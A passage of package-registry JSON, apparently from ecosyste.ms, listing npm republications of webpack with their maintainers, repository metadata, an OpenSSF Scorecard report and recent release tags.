https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":452,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":85,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"TheLarkInn","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/zhufeng-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/zhufeng-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/zhufeng-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/zhufeng-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/zhufeng-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/zhufeng-webpack/codemeta","maintainers":[{"uuid":"zhufengnodejs","login":"zhufengnodejs","name":null,"email":"zhufengnodejs@126.com","url":null,"packages_count":12,"html_url":"https://www.npmjs.com/~zhufengnodejs","role":null,"created_at":"2022-11-15T15:03:21.745Z","updated_at":"2022-11-15T15:03:21.745Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/zhufengnodejs/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1001305,"name":"@jdxcode/webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"jdxcode","versions_count":2,"first_release_published_at":"2021-11-13T15:58:16.256Z","latest_release_published_at":"2021-11-13T15:49:03.041Z","latest_release_number":"5.64.0-test","last_synced_at":"2026-09-03T00:17:36.895Z","created_at":"2022-04-07T18:57:00.650Z","updated_at":"2026-09-03T00:17:36.895Z","registry_url":"https://www.npmjs.com/package/@jdxcode/webpack","install_command":"npm install @jdxcode/webpack","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"5.0.0-beta.16"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl"